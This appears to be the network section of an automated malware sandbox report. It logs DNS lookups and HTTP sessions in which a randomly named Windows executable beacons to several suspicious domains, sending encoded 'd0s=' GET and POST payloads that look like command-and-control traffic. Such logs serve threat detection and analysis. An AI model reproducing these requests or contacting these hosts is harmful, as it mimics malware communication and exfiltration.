                                                                      Nov 27, 2024 08:55:47.239866018 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537363052 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537409067 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537422895 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537481070 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537493944 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537492990 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.537507057 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537522078 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537561893 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.537578106 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.537733078 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537746906 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537763119 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.537787914 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.537827969 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.634078979 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.657587051 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.657601118 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.657731056 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.657773018 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.707470894 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.707532883 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.707545042 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.707583904 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.729089975 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.729182005 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.729212046 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.729243994 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.733314991 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.733380079 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.734813929 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.734884024 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.734899998 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.734956980 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:48.741766930 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:48.741847038 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:49.653701067 CET4992380192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:49.773917913 CET8049923163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:49.774113894 CET4992380192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:49.789228916 CET4992380192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:49.910919905 CET8049923163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:49.910936117 CET8049923163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:51.290302992 CET4992380192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:51.410708904 CET8049923163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:51.410774946 CET4992380192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:52.309003115 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:52.428927898 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:52.429080009 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:52.438808918 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:52.558779955 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964023113 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964051962 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964063883 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964128017 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964139938 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964152098 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964164972 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964205027 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:53.964243889 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:53.964356899 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964370012 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964396954 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:53.964462042 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:53.964498997 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:54.084208012 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.084280968 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.084409952 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:54.174422026 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.174463034 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.174637079 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:54.178606033 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.178720951 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.178827047 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:54.184987068 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.185091019 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:54.185178995 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:54.192250013 CET4992980192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:54.312237024 CET8049929163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:56:00.931967974 CET4995080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:01.053219080 CET8049950120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:01.053369999 CET4995080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:01.072271109 CET4995080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:01.192285061 CET8049950120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:02.587194920 CET4995080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:02.648123026 CET8049950120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:02.648224115 CET4995080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:02.708937883 CET8049950120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:02.709197998 CET4995080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:03.605808020 CET4995680192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:03.726464033 CET8049956120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:03.726562977 CET4995680192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:03.744219065 CET4995680192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:03.864140034 CET8049956120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:05.260056019 CET4995680192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:05.304394007 CET8049956120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:05.304456949 CET4995680192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:05.380578995 CET8049956120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:05.380629063 CET4995680192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:06.278023958 CET4996280192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:06.398736000 CET8049962120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:06.398835897 CET4996280192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:06.415921926 CET4996280192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:06.536415100 CET8049962120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:06.536431074 CET8049962120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:07.920593023 CET4996280192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:07.989901066 CET8049962120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:07.989964962 CET4996280192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:08.040853977 CET8049962120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:08.040906906 CET4996280192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:08.934087992 CET4997080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:09.054012060 CET8049970120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:09.054430962 CET4997080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:09.064431906 CET4997080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:09.184875011 CET8049970120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:10.624063969 CET8049970120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:10.666116953 CET4997080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:10.868180990 CET8049970120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:10.869313002 CET4997080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:10.872597933 CET4997080192.168.2.7120.26.240.121
                                                                      Nov 27, 2024 08:56:10.992472887 CET8049970120.26.240.121192.168.2.7
                                                                      Nov 27, 2024 08:56:16.379940987 CET4998880192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:16.500080109 CET8049988209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:16.500184059 CET4998880192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:16.520050049 CET4998880192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:16.640218973 CET8049988209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:17.723216057 CET8049988209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:17.723710060 CET8049988209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:17.723762035 CET4998880192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:20.024852037 CET4998880192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:21.043492079 CET4999680192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:21.163594961 CET8049996209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:21.166690111 CET4999680192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:21.181942940 CET4999680192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:21.301956892 CET8049996209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:22.397032022 CET8049996209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:22.397157907 CET8049996209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:22.397290945 CET4999680192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:22.696913004 CET4999680192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:23.715647936 CET4999780192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:23.835675955 CET8049997209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:23.835788012 CET4999780192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:23.851372957 CET4999780192.168.2.7209.74.77.108
                                                                      Nov 27, 2024 08:56:23.971704006 CET8049997209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:23.971805096 CET8049997209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:25.102813959 CET8049997209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:25.102847099 CET8049997209.74.77.108192.168.2.7
                                                                      Nov 27, 2024 08:56:25.106200933 CET4999780192.168.2.7209.74.77.108
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 27, 2024 08:55:01.348349094 CET6138753192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:55:02.393825054 CET6138753192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:55:02.512177944 CET53613871.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:55:02.531305075 CET53613871.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:55:18.997452021 CET5088153192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:55:19.550736904 CET53508811.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:55:34.304004908 CET5876653192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:55:34.528830051 CET53587661.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:55:42.590471029 CET6445053192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:55:43.603003979 CET6445053192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:55:44.312582016 CET53644501.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:55:44.312607050 CET53644501.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:55:59.200455904 CET5557853192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:56:00.212276936 CET5557853192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:56:00.926677942 CET53555781.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:56:00.926702023 CET53555781.1.1.1192.168.2.7
                                                                      Nov 27, 2024 08:56:15.896927118 CET4996253192.168.2.71.1.1.1
                                                                      Nov 27, 2024 08:56:16.376112938 CET53499621.1.1.1192.168.2.7
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 27, 2024 08:55:01.348349094 CET192.168.2.71.1.1.10xf277Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:02.393825054 CET192.168.2.71.1.1.10xf277Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:18.997452021 CET192.168.2.71.1.1.10x56beStandard query (0)www.zxyck.netA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:34.304004908 CET192.168.2.71.1.1.10x57f1Standard query (0)www.egldfi.xyzA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:42.590471029 CET192.168.2.71.1.1.10x5798Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:43.603003979 CET192.168.2.71.1.1.10x5798Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:59.200455904 CET192.168.2.71.1.1.10xf4acStandard query (0)www.buckser.infoA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:56:00.212276936 CET192.168.2.71.1.1.10xf4acStandard query (0)www.buckser.infoA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:56:15.896927118 CET192.168.2.71.1.1.10xc3b8Standard query (0)www.innovateideas.xyzA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 27, 2024 08:55:02.512177944 CET1.1.1.1192.168.2.70xf277No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:02.531305075 CET1.1.1.1192.168.2.70xf277No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:19.550736904 CET1.1.1.1192.168.2.70x56beNo error (0)www.zxyck.net118.107.250.103A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:34.528830051 CET1.1.1.1192.168.2.70x57f1Name error (3)www.egldfi.xyznonenoneA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:44.312582016 CET1.1.1.1192.168.2.70x5798No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:55:44.312607050 CET1.1.1.1192.168.2.70x5798No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:56:00.926677942 CET1.1.1.1192.168.2.70xf4acNo error (0)www.buckser.info120.26.240.121A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:56:00.926702023 CET1.1.1.1192.168.2.70xf4acNo error (0)www.buckser.info120.26.240.121A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 08:56:16.376112938 CET1.1.1.1192.168.2.70xc3b8No error (0)www.innovateideas.xyz209.74.77.108A (IP address)IN (0x0001)false
                                                                      • www.madhf.tech
                                                                      • www.zxyck.net
                                                                      • www.sankan-fukushi.info
                                                                      • www.buckser.info
                                                                      • www.innovateideas.xyz
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.749810103.224.182.242802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:02.716839075 CET537OUTGET /1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/XPrUV&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Connection: close
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Nov 27, 2024 08:55:03.951308966 CET1236INHTTP/1.1 200 OK
                                                                      date: Wed, 27 Nov 2024 07:55:03 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1732694103.8961630; expires=Sat, 25-Nov-2034 07:55:03 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-length: 1553
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 31 62 6b 6c 2f 3f 64 30 73 3d 55 59 32 32 69 62 41 48 53 4b 43 4b 4a 39 46 6a 50 42 56 7a 44 2b 2b 61 62 4f 38 49 74 35 4a 63 59 50 43 6b 50 63 4f 6e 71 59 51 75 35 2f 7a 78 45 63 64 33 49 62 55 59 62 4d 78 63 6c 62 57 59 71 6c 78 49 69 48 71 76 2f 66 68 65 49 35 68 77 54 31 45 4e 67 34 4c 46 6c 39 67 33 41 41 4e 34 2b 30 78 34 36 66 64 51 79 76 2b 51 67 65 49 34 33 38 41 35 30 73 61 59 67 31 61 79 43 2f 70 4b 72 70 63 6d 38 59 2f 58 50 72 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/XPrUV&Zvd8B=gHrX0lXPMBRt-RA&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><b
                                                                      Nov 27, 2024 08:55:03.951390028 CET589INData Raw: 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f
                                                                      Data Ascii: ody bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD++abO8It5JcYPCkPcOnqYQu5/zxEcd3IbUYbMxclbWYqlxIiHqv/fheI5hwT1ENg4LFl9g3AAN4+0x46fdQyv+QgeI438A50saYg1ayC/pKrpcm8Y/X


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.749849118.107.250.103802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:19.696070910 CET780OUTPOST /yp7g/ HTTP/1.1
                                                                      Host: www.zxyck.net
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.zxyck.net
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 216
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/yp7g/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6b 4d 61 73 61 72 49 56 72 6a 35 41 35 67 53 79 39 4c 41 79 63 71 72 72 6c 79 54 6c 46 51 2f 7a 4a 39 6f 56 72 71 61 5a 6c 79 6a 6a 73 35 43 37 50 2f 39 46 33 53 62 37 63 76 33 62 31 47 35 63 68 69 79 4d 4b 49 4d 41 70 6d 35 2f 70 39 6a 57 70 73 35 71 41 51 46 46 42 56 71 70 64 4c 31 53 2b 38 33 71 61 45 55 6b 6e 41 43 6b 69 65 42 68 35 49 39 2b 7a 59 70 31 48 39 45 4b 6a 6d 48 56 70 2b 65 56 33 4a 7a 76 58 49 46 70 51 5a 68 56 32 67 65 30 57 5a 64 63 74 72 52 4e 4b 66 34 76 72 65 72 71 68 4d 6c 63 4e 34 6f 75 48 47 47 31 78 53 48 42 58 48 4d 61 4d 41 74 7a 32 41 6d 47 59 76 71 42 75 77 3d 3d
                                                                      Data Ascii: d0s=z3rpOHVQltv/kMasarIVrj5A5gSy9LAycqrrlyTlFQ/zJ9oVrqaZlyjjs5C7P/9F3Sb7cv3b1G5chiyMKIMApm5/p9jWps5qAQFFBVqpdL1S+83qaEUknACkieBh5I9+zYp1H9EKjmHVp+eV3JzvXIFpQZhV2ge0WZdctrRNKf4vrerqhMlcN4ouHGG1xSHBXHMaMAtz2AmGYvqBuw==
                                                                      Nov 27, 2024 08:55:21.295358896 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 27 Nov 2024 07:54:19 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd ca 02 f3 74 3d 00 bd 2f 05 cb 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///lt=/0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.749859118.107.250.103802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:22.368973970 CET800OUTPOST /yp7g/ HTTP/1.1
                                                                      Host: www.zxyck.net
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.zxyck.net
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 236
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/yp7g/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6c 73 71 73 62 4d 38 56 71 44 35 44 6c 77 53 79 30 72 41 75 63 71 6e 72 6c 7a 58 31 46 43 72 7a 4a 64 59 56 71 6f 69 5a 6d 79 6a 6a 6a 5a 43 36 52 50 38 4c 33 53 58 4a 63 71 33 62 31 47 64 63 68 6d 69 4d 4b 5a 4d 44 70 32 34 5a 68 64 6a 44 30 38 35 71 41 51 46 46 42 52 43 48 64 4c 39 53 2b 76 2f 71 56 47 38 6e 75 67 43 6e 32 4f 42 68 7a 6f 39 36 7a 59 70 44 48 2b 41 73 6a 67 4c 56 70 2f 4f 56 33 61 72 6f 5a 49 46 7a 49 35 67 70 32 41 62 73 63 59 4e 30 6e 39 64 71 47 50 77 50 6a 49 71 49 37 75 70 77 54 70 51 56 44 45 69 44 6d 30 61 30 56 47 49 43 42 69 5a 53 70 33 44 73 56 39 4c 46 34 48 39 77 4f 30 66 6a 2b 53 48 75 42 66 31 75 2b 7a 72 54 6d 75 45 3d
                                                                      Data Ascii: d0s=z3rpOHVQltv/lsqsbM8VqD5DlwSy0rAucqnrlzX1FCrzJdYVqoiZmyjjjZC6RP8L3SXJcq3b1GdchmiMKZMDp24ZhdjD085qAQFFBRCHdL9S+v/qVG8nugCn2OBhzo96zYpDH+AsjgLVp/OV3aroZIFzI5gp2AbscYN0n9dqGPwPjIqI7upwTpQVDEiDm0a0VGICBiZSp3DsV9LF4H9wO0fj+SHuBf1u+zrTmuE=
                                                                      Nov 27, 2024 08:55:23.960669994 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 27 Nov 2024 07:54:22 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd ca 02 f3 74 3d 00 bd 2f 05 cb 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
